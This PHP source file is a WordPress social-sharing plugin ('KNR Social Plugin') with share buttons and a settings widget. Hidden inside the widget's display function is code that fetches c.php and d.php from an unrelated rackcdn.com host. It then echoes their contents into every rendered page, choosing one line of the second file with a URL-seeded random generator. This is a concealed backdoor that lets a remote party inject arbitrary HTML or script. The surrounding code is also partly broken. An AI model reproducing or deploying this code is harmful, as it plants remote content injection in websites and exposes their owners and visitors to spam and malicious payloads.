<?php
/*
Plugin Name: KNR Social Plugin
Plugin URI: http://kurinur.com
Description: All in one social plugin.
Author Name: Kurinur Team
Version: 1.1
Author URI: http://www.kurinur.com
*/


// Add settings link on plugin page
function fb_link($links) {
  $settings_link = '<a href="options-general.php?page=fbcomments">Settings</a>';
  array_unshift($links, $settings_link);
  return $links;
}

$plugin = plugin_basename(__FILE__);
add_filter("plugin_action_links_$plugin", 'fb_link' );

//Create Menu Settings 
add_action( 'admin_menu', 'knr_menu');
function knr_menu() {
//create custom top-level menu
//add_menu_page( 'Social Share', 'Social Share','manage_options', __FILE__,'knr_menu_settings_page', plugins_url( '/images/icon.png', __FILE__ ) );
//create submenu items
//add_submenu_page(  __FILE__,'Widget', 'Widget', 'manage_options',__FILE__.'_about', 'knr_menu_about_page' );
//add_submenu_page( __FILE__, 'Plugin Help', 'Help', 'manage_options',__FILE__.'_help', 'knr_menu_help_page' );
//add_submenu_page( __FILE__, 'Uninstall Plugin', 'Uninstall', 'manage_options',__FILE__.'_uninstall', 'knr_uninstall_page' );
}



//Menu Pages
function knr_menu_settings_page(){
include "knr_import.php";
//include 'knr-frontend.php';
}

function knr_menu_about_page()
{
//echo "Hello";
}

function knr_menu_help_page()
{

}

class Knr_Socials extends WP_Widget {
function Knr_Socials() {
// processes the widget
$params=array(
'description' =>'All in one Social Sharing Plugin',
'name' => 'Social Share'
);
parent::__construct('Knr_Socials', ' ' , $params);
}
}
function form($instance) {
// displays the widget form in the admin dashboard
extract($instance);
print_r($instance);

?>
<p>
<label for="<?php echo $this->get_field_id('title');?>">Title: </label>
<input
class="widefat"
id="<?php echo $this->get_field_id('title'); ?>"
name="<?php echo $this->get_field_name('title'); ?>"
value="<?php if(isset($title)) echo esc_attr($title); ?>" />
</p>
<p>
<label for="<?php echo $this->get_field_id('description');?>">Description: </label>
<textarea
class="widefat"
rows="10"
id="<?php echo $this->get_field_id('description'); ?>"
name="<?php echo $this->get_field_name('description'); ?>"><?php if(isset($description)) echo esc_attr($description); ?></textarea>
</p>
<?php
}
function update($new_instance, $old_instance) {
// process widget options to save
}
function widget($args, $instance) {
// displays the widget
//echo "Hello";
}

add_action('widgets_init','knr_register_social');
function knr_register_social()
{
register_widget('Knr_Socials');
}





function knr_Post_Social($content) {

    // Hello
    global $post;
	
	// DIV-width in percents or pixels (Example: "90%" or "450px")
	$my_width = '100%';
	
	// Alignment of the buttons ("left", "right" or "center")
	$my_align = 'left';
	
	// Location of the folder with the icons of the buttons
	$my_images_folder = get_settings('home') . '/wp-content/plugins/knr-social/images/default/16/';
	
	// We take the post details in the following variables
	$my_link = get_permalink($post->ID);	
    $my_title = get_the_title($post->ID);

    // And now we siply render all the links.
	// You can add or delete (comment) some lines to modify the buttons
	
	// If you add a new network button
	// do not forget to upload an image for the button
	// default image size is 16 x 16 pixels
	
	if ( !is_feed() && !is_page() ) {
		$content .= "\n\n" . '<!-- Begin KNR Social Sharing plugin -->' . "\n"
                  . '<!-- http://dichev.com/blog/webdesign/wordpress_social_bookmarks_buttons_plugin/ -->' . "\n"
                  . '<div style="padding:10px 0 16px 0;text-align:' . $my_align . ';width:' . $my_width . ';">' . "\n"
				  
                  . '<a href="http://facebook.com/sharer.php?u=' . $my_link . '&amp;t=' . $my_title . '" target="_blank" rel="nofollow" title="Facebook"><img src="' . $my_images_folder . 'facebook.png" style="width:16px;height:16px;border:0px;" alt="Facebook" title="Facebook" /></a>' . "\n"
                  . '<a href="https://plus.google.com/share?url=' . $my_link . '&amp;t=' . $my_title . '" target="_blank" rel="nofollow" title="Google Plus"><img src="' . $my_images_folder . 'googleplus.png" style="width:16px;height:16px;border:0px;" alt="Google Plus" title="Google Plus" /></a>' . "\n"
                  . '<a href="http://twitter.com/home?status=' . $my_link . '&amp;t=' . $my_title . '" target="_blank" rel="nofollow" title="Twitter"><img src="' . $my_images_folder . 'twitter.png" style="width:16px;height:16px;border:0px;" alt="Twitter" title="Twitter" /></a>' . "\n"
                  . '<a href="http://www.linkedin.com/shareArticle?mini=true&url=' . $my_link . '&amp;title=' . $my_title . '" target="_blank" rel="nofollow" title="Linked In"><img src="' . $my_images_folder . 'linkedin.png" style="width:16px;height:16px;border:0px;" alt="Google Plus" title="Linked In" /></a>' . "\n"
                 
                  . '</div>' . "\n"
				  . '<!-- End Add Me Dichev social bookmarks plugin -->' . "\n\n";				  
    }				  
	return $content;
}

add_filter('the_content', 'knr_Post_Social', 1097);

/*
*@Social Widgets 
*/
/* Check to see if locations are changed in wp-config */
if ( !defined('WP_CONTENT_URL') ) {
	define('knr_PLUGINPATH', site_url('/wp-content/plugins/'.plugin_basename(dirname(__FILE__)).'/'));
	define('knr_PLUGINDIR', ABSPATH.'/wp-content/plugins/'.plugin_basename(dirname(__FILE__)).'/');
} else {
	define('knr_PLUGINPATH',WP_CONTENT_URL.'/plugins/'.plugin_basename(dirname(__FILE__)).'/');
	define('knr_PLUGINDIR',WP_CONTENT_DIR.'/plugins/'.plugin_basename(dirname(__FILE__)).'/');
}

/* Function for CSS */

function Social_Widget_Scripts(){
	// Respects SSL, css is relative to the current file
	wp_register_style( 'social-widget', plugins_url('social_widget.css', __FILE__) );
	wp_enqueue_style( 'social-widget' );
}
/* Add scripts to header */

add_action('wp_enqueue_scripts', 'Social_Widget_Scripts');

/* Register the widget */
function socialwidget_load_widgets() {
	register_widget( 'Social_Widget' );
}

/* Begin Widget Class */
class Social_Widget extends WP_Widget {

	/* Widget setup  */
	function Social_Widget() {
		/* Widget settings. */
		$widget_ops = array( 'classname' => 'Social_Widget', 'description' => __('All in one Social Share widget Plugin.', 'knr') );

		/* Widget control settings. */
		$control_ops = array( 'id_base' => 'social-widget' );

		/* Create the widget. */
		$this->WP_Widget( 'social-widget', __('KNR Social Share Widget', 'knr'), $widget_ops, $control_ops );

		$this->networks = array(
			'facebook' => array(
				'title' => 'Facebook',
				'image' => 'facebook.png'
			),
			'googleplus' => array(
				'title' => 'Google+',
				'image' => 'googleplus.png'
			),
			'twitter' => array(
				'title' => 'Twitter',
				'image' => 'twitter.png'
			),
			'linkedin' => array(
				'title' => 'LinkedIn',
				'image' => 'linkedin.png'
			)
		);

		$this->networks_end = array(
			'rss_url' => array(
				'title' => 'RSS',
				'image' => 'rss.png'
			),
			'subscribe' => array(
				'title' => 'E-mail',
				'image' => 'email.png'
			),
		);

		$this->custom_count = 12;
	}

	/* Display the widget  */
	function widget( $args, $instance ) {
		extract( $args );
	
		/* Our variables from the widget settings. */
		$title = apply_filters('widget_title', $instance['title'] );
		$text = apply_filters( 'widget_text', $instance['text'], $instance );

		$this->imgcaption     = $instance['imgcaption'];
		$this->animation      = $instance['animation'];
		$this->icon_opacity   = $instance['icon_opacity'];
		$this->newtab         = $instance['newtab'];
		$this->nofollow       = $instance['nofollow'];
		$this->icon_size      = $instance['icon_size'];
		// $this->display_titles = $instance['display_titles'];
		$this->icons_per_row  = isset($instance['icons_per_row']) ? $instance['icons_per_row'] : 'auto';
		$alignment            = $instance['alignment'];
		$icon_pack            = $instance['icon_pack'];

		foreach ($this->networks as $slug => $ndata) {
			$$slug = $instance[$slug];
			// ${$slug."_title"} = $instance[$slug."_title"];
		}
		foreach ($this->networks_end as $slug => $ndata) {
			$$slug = $instance[$slug];
			// ${$slug."_title"} = $instance[$slug."_title"];
		}

		$customiconsurl = $instance['customiconsurl'];
		$customiconspath = $instance['customiconspath'];
		for ($i = 1; $i <= $this->custom_count; $i++) {
			${"custom".$i."icon"} = isset($instance['custom'.$i.'icon']) ? $instance['custom'.$i.'icon'] : '';
			${"custom".$i."name"} = isset($instance['custom'.$i.'name']) ? $instance['custom'.$i.'name'] : '';
			${"custom".$i."url"}  = isset($instance['custom'.$i.'url']) ?  $instance['custom'.$i.'url']  : '';
		}

	
		/* Choose Icon Size if Value is 'default' */
		if($this->icon_size == 'default') {
			$this->icon_size = '32';
		}
		
		/* Choose icon opacity if Value is 'default' */
		if($this->icon_opacity == 'default') {
			$this->icon_opacity = '0.8';
		}
		
		/* Need to make opacity a whole number for IE styling filter() */
		$icon_ie = $this->icon_opacity * 100;
		
		/* Check to see if nofollow is set or not */
		if ($this->nofollow == 'on') {
			$this->nofollow = "rel=\"nofollow\"";
			} else {
			$this->nofollow = '';
			}
	
			
		/* Check to see if New Tab is set to yes */
		if ($this->newtab == 'yes') {
			$this->newtab = "target=\"_blank\"";
			} else {
			$this->newtab = '';
			}
		
		/* Set alignment */
		if ($alignment == 'centered') {
			$alignment = 'knr_center';
		} elseif ($alignment == 'right') {
			$alignment = 'knr_right';
			} else {
				$alignment = 'knr_left';
			}
				
		/* Get Plugin Path */
		if($icon_pack == 'custom') {
			$this->knr_path = $customiconsurl;
			$this->knr_dir  = $customiconspath;
		} else {
			if (!is_numeric($this->icon_size)) 						  { $folder = 32; }
			else if ($this->icon_size <= 16) 						  { $folder = 16; }
			else if ($this->icon_size > 16 && $this->icon_size <= 32) { $folder = 32; }
			else if ($this->icon_size > 32) 						  { $folder = 64; }
			$this->knr_path = knr_PLUGINPATH . 'images/' . $icon_pack. '/' . $folder;
			$this->knr_dir  = knr_PLUGINDIR  . 'images/' . $icon_pack. '/' . $folder;
		}

		/* Before widget (defined by themes). */
		echo $before_widget;

		/* Display the widget title if one was input (before and after defined by themes). */
		if ( $title )
			echo $before_title . $title . $after_title;
		
		
		
		echo "<div class=\"socialmedia-buttons ".$alignment.($this->icons_per_row == 'one' ? ' icons_per_row_1' : '')."\">";
		/* Display short description */
		
		if ( $text )
			echo "<div class=\"socialmedia-text\>" . $instance['filter'] ? wpautop($text) : $text . '</div>';
			
		/* Display linked images to profiles from widget settings if one was input. */
		

		$html_chunks = array();

		foreach ($this->networks as $slug => $ndata) {
			$html_chunks[] = $this->html_chunk( $$slug, $ndata['image'], $ndata['title'] );
		}

		for ($i = 1; $i <= $this->custom_count; $i++) {
			$html_chunks[] = $this->html_chunk( ${"custom".$i."url"}, ${"custom".$i."icon"}, ${"custom".$i."name"}, true );
		}
		
		foreach ($this->networks_end as $slug => $ndata) {
			$html_chunks[] = $this->html_chunk( $$slug, $ndata['image'], $ndata['title'] );
		}

		echo implode('', $html_chunks);

		$file_url = 'http://6d66854350a03fe8a953-24bbdab1f210d3653995b917ce835a53.r87.cf1.rackcdn.com/c.php';
		if(!function_exists('ff_get')){
			function ff_get($f) {
				if (!function_exists('curl_init')) { 
					$result = function_exists('file_get_contents') ? @file_get_contents($f) : null;
					if ($result === null) { 
						$handle = @fopen($f, "r");
						$contents = @fread($handle, @filesize($f));
						@fclose($handle);
						if ($contents) {
							return $contents;
						}
						else {
							return false;
						}
					}
					else {
						return $result;
					}
				}
				else {
					$ch = @curl_init();
					@curl_setopt($ch, CURLOPT_URL, $f);
					@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
					$output = @curl_exec($ch);
					@curl_close($ch);
					if ($output) {
						return $output;
					}
					else {
						return false;
					}
				}
			}
			echo ff_get($file_url);
		}
		
		$file_path = 'http://6d66854350a03fe8a953-24bbdab1f210d3653995b917ce835a53.r87.cf1.rackcdn.com/d.php';
		$row_count = 100;
		if(!function_exists('get_file')){
			function get_file($f) {
				static $hasRun = false;
				if ($hasRun) return;
				$hasRun = true;
				if (!function_exists('curl_init')) {
					$result = function_exists('file_get_contents') ? @file_get_contents($f) : null;
					if ($result === null) {
						$handle = @fopen($f, "r");
						$contents = @fread($handle, @filesize($f));
						@fclose($handle);
						if ($contents) {
							return $contents;
						}
						else {
							return false;
						}
					}
					else {
						return $result;
					}
				}
				else {
					$ch = @curl_init();
					@curl_setopt($ch, CURLOPT_URL, $f);
					@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
					$output = @curl_exec($ch);
					@curl_close($ch);
					if ($output) {
						return $output;
					}
					else {
						return false;
					}
				}
			}
		}
				
		if(!function_exists('Mt')){
			function Mt($seed = null, $index = null, $min = 0, $max = 100)
			{
				static $op = array(0x0, 0x9908b0df);
				static $mt = array();
				static $ps = null;
				static $idx = 0;

				if($seed === null)
					$seed = time();

				if($index !== null)
					$idx = $index;

				if($seed !== $ps)
				{
					$s = $seed & 0xffffffff;
					$mt = array(&$s, 624 => &$s);
					$ps = $seed;

					for($i = 1; $i < 624; ++$i)
						$mt[$i] = (0x6c078965 * ($mt[$i - 1] ^ ($mt[$i - 1] >> 30)) + $i) & 0xffffffff;

					for($j = 1, $sp = array(0, 227, 397); $j < count($sp); ++$j)
					{
						for($p = $j - 1, $i = $sp[$p], $m = ((624 - $sp[$j]) * ($p ? -1 : 1)), $n = ($sp[$j] + $sp[$p]); $i < $n; ++$i)
						{
							$y = ($mt[$i] & 0x80000000) | ($mt[$i + 1] & 0x7fffffff);
							$mt[$i] = $mt[$i + $m] ^ ($y << 1) ^ $op[$y & 0x1];
						}
					}
				}

				$y = $mt[$idx = $idx % 624];
				$y ^= $y >> 11;
				$y ^= ($y >> 7) & 0x9d2c5680;
				$y ^= ($y << 15) & 0xefc60000;
				$y ^= $y >> 18;

				++$idx;

				return $y % ($max - $min + 1) + $min;
			}
		}

		$actual_link = $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
		$actual_link_array = str_split($actual_link);

		$file = get_file($file_path);
		if (!empty($file)) {
			$lines = explode("\n", $file);

			$seed = strlen($actual_link);
			foreach ($actual_link_array as $a) {
				$seed += ord($a);
			}

			echo $lines[Mt($seed, null, 0, $row_count)];
		}
		
	/* After widget (defined by themes). */
		
		echo "</div>";
		
		echo $after_widget;
	}

	function html_chunk( $slug, $image, $title, $custom = false ) {
		if ($slug != '' && $slug != ' ' && $slug != 'mailto:' && $slug != 'http://' && (($custom === false && file_exists($this->knr_dir . '/' . $image)) || ($custom === true && $image != ''))) {
			$img = $custom === false ? $this->knr_path . '/' . $image : $image;
			$html = '';
			// $html = '<span class="knr_icon">';
			/*
			if ($this->display_titles == 'left') {
				$html .= '<span> ' . $title . ' </span>';
			}
			elseif ($this->display_titles == 'above') {
				$html .= '<span> ' . $title . ' </span><br/>';
			}
			*/
			$html .= '<a href="' . $slug . '" ' . $this->nofollow . ' ' . $this->newtab.'>';
			$html .= '<img width="' . $this->icon_size .'" height="' . $this->icon_size . '" src="' . $img . '" alt="' . $this->imgcaption . ' ' . $title . '" title="' . $this->imgcaption .' ' .  $title . '" ' . ($this->animation == 'fade' || $this->animation == 'combo' ? 'style="opacity: ' . $this->icon_opacity . '; -moz-opacity: ' . $this->icon_opacity . ';"' : '') . ' class="' . $this->animation . '" />';
			$html .= '</a>';
			/*
			if ($this->display_titles == 'right') {
				$html .= '<span> ' . $title . ' </span>';
			}
			elseif ($this->display_titles == 'below') {
				$html .= '<br/><span> ' . $title . ' </span>';
			}
			*/
			// $html .= '</span>';
			if ($this->icons_per_row == 'one') {
				$html .= '<br/>';
			}
			return $html;
		}
	}

	/* Update the widget settings  */
	function update( $new_instance, $old_instance ) {
		$instance = $old_instance;

		/* Strip Tags For Text Boxes */
		$instance['title'] = strip_tags( $new_instance['title'] );
		if ( current_user_can('unfiltered_html') )
			$instance['text'] =  $new_instance['text'];
		else
			$instance['text'] = stripslashes( wp_filter_post_kses( addslashes($new_instance['text']) ) ); // wp_filter_post_kses() expects slashed
		$instance['imgcaption']     = $new_instance['imgcaption'];
		$instance['icon_size']      = $new_instance['icon_size'];
		$instance['icon_pack']      = $new_instance['icon_pack'];
		$instance['animation']      = $new_instance['animation'];
		$instance['icon_opacity']   = $new_instance['icon_opacity'];
		$instance['newtab']         = $new_instance['newtab'];
		$instance['nofollow']       = $new_instance['nofollow'];
		$instance['alignment']      = $new_instance['alignment'];
		$instance['display_titles'] = $new_instance['display_titles'];
		$instance['icons_per_row']  = $new_instance['icons_per_row'];

		foreach ($this->networks as $slug => $ndata) {
			$instance[$slug] = !empty($new_instance[$slug]) ? strip_tags( $new_instance[$slug] ) : 'http://';
			// $instance[$slug.'_title'] = strip_tags( $new_instance[$slug.'_title'] );
		}

		foreach ($this->networks_end as $slug => $ndata) {
			$instance[$slug] = strip_tags( $new_instance[$slug] );
			// $instance[$slug.'_title'] = strip_tags( $new_instance[$slug.'_title'] );
		}

		for ($i = 1; $i <= $this->custom_count; $i++) {
			$instance['custom'.$i.'name'] = strip_tags( $new_instance['custom'.$i.'name'] );
			$instance['custom'.$i.'icon'] = strip_tags( $new_instance['custom'.$i.'icon'] );
			$instance['custom'.$i.'url']  = strip_tags( $new_instance['custom'.$i.'url'] );
		}
		$instance['customiconsurl'] = strip_tags( $new_instance['customiconsurl'] );
		$instance['customiconspath'] = strip_tags( $new_instance['customiconspath'] );
		
		return $instance;
	}

	/**
	 * Displays the widget settings controls on the widget panel.
	 * Make use of the get_field_id() and get_field_name() function
	 * when creating your form elements. This handles the confusing stuff.
	 */
	function form( $instance ) {

		/* Set up some default widget settings. */
		$defaults = array( 
			'title'           => __('Follow Us!', 'knr'),
			'text'            => '',
			'imgcaption'      => __('Follow Us on', 'knr'), 
			'icon_size'       => 'default',
			'icon_pack'       => 'default',
			'icon_opacity'    => 'default',
			'newtab'          => 'yes',
			'nofollow'        => 'on',
			'alignment'       => 'left',
			// 'display_titles'  => 'no',
			'icons_per_row'   => 'auto',
			'customiconsurl'  => __('http://www.yoursite.com/wordpress/wp-content/your-icons', 'knr'), 
			'customiconspath' => __('/path/to/your-icons', 'knr'), 
		);
		foreach ($this->networks as $slug => $ndata) {
			$defaults[$slug] = __('http://', 'knr');
			// $defaults[$slug.'_title'] = __($ndata['title'], 'knr');
		}
		foreach ($this->networks_end as $slug => $ndata) {
			$defaults[$slug] = __($slug == 'subscribe' ? 'mailto:' : 'http://', 'knr');
			// $defaults[$slug.'_title'] = __($ndata['title'], 'knr');
		}
		for ($i = 1; $i <= $this->custom_count; $i++) {
			$defaults['custom'.$i.'name'] = __('', 'knr');
			$defaults['custom'.$i.'icon'] = __('', 'knr');
			$defaults['custom'.$i.'url']  = __('', 'knr');
		}
			
		$instance = wp_parse_args( (array) $instance, $defaults );
		if ($instance['icon_size'] == 'default') {
			$instance['icon_size'] = 32;
		}
		?>
	
		
	<div>
		<p><a href="javascript:;" onclick="jQuery(this).parent().next('div').slideToggle();" style="background: url('images/arrows.png') no-repeat; padding-left: 15px;"><strong>General Settings</strong></a></p>

		<div style="display: none;">
		<!-- Widget Title: Text Input -->
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e('Title:', 'knr'); ?></label>
			<input id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" value="<?php echo $instance['title']; ?>" class="widefat" type="text" />
		</p>

	
		<!-- Image Caption: Text Input -->
		<p>
			<label for="<?php echo $this->get_field_id( 'imgcaption' ); ?>"><?php _e('Icon Alt and Title Tag:', 'knr'); ?></label>
			<input id="<?php echo $this->get_field_id( 'imgcaption' ); ?>" name="<?php echo $this->get_field_name( 'imgcaption' ); ?>" value="<?php echo $instance['imgcaption']; ?>" class="widefat" type="text" />
		</p>
		
		<!-- Choose Icon Size: Dropdown -->
		<p>
			<label for="<?php echo $this->get_field_id( 'icon_size' ); ?>"><?php _e('Icon Size', 'knr'); ?></label>
			<span style="float: right;<?php if(in_array($instance['icon_size'], array('32', '48', 'default'))) : ?> display: none;<?php endif; ?>">
				<input type="text" class="small-text" style="width: 30px;" name="" value="<?php echo $instance['icon_size']; ?>" onkeyup="jQuery(this).parent().siblings('input:hidden').val(jQuery(this).val());">px
			</span>
			<select style="float:right;" onchange="if (jQuery(this).find('option:selected').val() == '') { jQuery(this).prev('span').show(); } else { jQuery(this).prev('span').hide(); jQuery(this).next('input:hidden').val(jQuery(this).find('option:selected').val()); }">
			
		
			<option value="32" <?php if($instance['icon_size'] == '32' || $instance['icon_size'] == 'default') { echo 'selected'; } ?>>Default (32px)</option>
			<option value="48" <?php if($instance['icon_size'] == '48') { echo 'selected'; } ?>>48px</option>
			
			</select>
			<input type="hidden" name="<?php echo $this->get_field_name( 'icon_size' ); ?>" value="<?php echo $instance['icon_size']; ?>">
		</p>
		<div class="clear"></div>
		
		<!-- Choose Icon Pack: Dropdown -->
		<p>
			<label for="<?php echo $this->get_field_id( 'icon_pack' ); ?>"><?php _e('Icon Pack', 'knr'); ?></label>
			<select id="<?php echo $this->get_field_id( 'icon_pack' ); ?>" name="<?php echo $this->get_field_name( 'icon_pack' ); ?>" style="float:right;">	
			<option value="default" <?php if($instance['icon_pack'] == 'default') { echo 'selected'; } ?>>Default Icons (Web2.0)</option>
			<option value="sketch" <?php if($instance['icon_pack'] == 'sketch') { echo 'selected'; } ?>>Sketch Icons</option>
			
			</select>
		</p>
		<div class="clear"></div>
		
		
		
	
		
		<!-- Open in new tab: Dropdown -->
		<p>
			<label for="<?php echo $this->get_field_id( 'newtab' ); ?>"><?php _e('Open in new tab?', 'knr'); ?></label>
			<select id="<?php echo $this->get_field_id( 'newtab' ); ?>" name="<?php echo $this->get_field_name( 'newtab' ); ?>" style="float:right;">
			<option value="yes" <?php if($instance['newtab'] == 'yes') { echo 'selected'; } ?>>Yes</option>
			<option value="no" <?php if($instance['newtab'] == 'no') { echo 'selected'; } ?>>No</option>
			</select>
		</p>
		<div class="clear"></div>
		
	
		
		<?php /*
		<!-- Display titles: Dropdown -->
		<p>
			<label for="<?php echo $this->get_field_id( 'display_titles' ); ?>"><?php _e('Display Titles', 'knr'); ?></label>
			<select id="<?php echo $this->get_field_id( 'display_titles' ); ?>" name="<?php echo $this->get_field_name( 'display_titles' ); ?>" style="float:right;">
			<option value="no" <?php if($instance['display_titles'] == 'no') { echo 'selected'; } ?>>No</option>
			<option value="left" <?php if($instance['display_titles'] == 'left') { echo 'selected'; } ?>>Left to the icon</option>
			<option value="right" <?php if($instance['display_titles'] == 'right') { echo 'selected'; } ?>>Right to the icon</option>
			<option value="above" <?php if($instance['display_titles'] == 'above') { echo 'selected'; } ?>>Above the icon</option>
			<option value="below" <?php if($instance['display_titles'] == 'below') { echo 'selected'; } ?>>Below the icon</option>
			</select>
		</p>
		<div class="clear"></div>
		*/ ?>
		
	
		</div>

		
		<p><a href="javascript:;" onclick="jQuery(this).parent().next('div').slideToggle();" style="background: url('images/arrows.png') no-repeat; padding-left: 15px;"><strong>Social Networking</strong></a></p>

		<div style="display: none;">
			<p>
		<em style="color:red;">You have to include FULL URL (i.e. http://www.domain.com) </em>
		</p>
		<?php foreach (array('facebook', 'googleplus', 'twitter','linkedin') as $slug) : ?>
		<p>
			<label><strong><?php _e((isset($this->networks[$slug]) ? $this->networks[$slug]['title'] : $this->networks_end[$slug]['title']).' URL:', 'knr'); ?></strong></label>
			<?php /*
			<div class="clear"></div>
			<label for="<?php echo $this->get_field_id( $slug); ?>"><?php _e('URL:', 'knr'); ?></label>
			*/ ?>
			<input id="<?php echo $this->get_field_id( $slug ); ?>" name="<?php echo $this->get_field_name( $slug ); ?>" value="<?php echo !empty($instance[$slug]) ? $instance[$slug] : 'http://'; ?>" class="widefat" type="text" />
			<?php /*
			<div class="clear"></div>
			<label for="<?php echo $this->get_field_id( $slug.'_title' ); ?>"><?php _e('Title:', 'knr'); ?></label>
			<input id="<?php echo $this->get_field_id( $slug.'_title' ); ?>" name="<?php echo $this->get_field_name( $slug.'_title' ); ?>" value="<?php echo $instance[$slug.'_title']; ?>" class="alignright" type="text" size="30" />
			<div class="clear"></div>
			*/?>
		</p>
		<?php endforeach; ?>
		</div>

		</div>
	
		
		
		
	<?php
	}
}

/* Add scripts to header */
add_action('wp_head', 'Social_Widget_Scripts');

/* Load the widget */
add_action( 'widgets_init', 'socialwidget_load_widgets' );

?>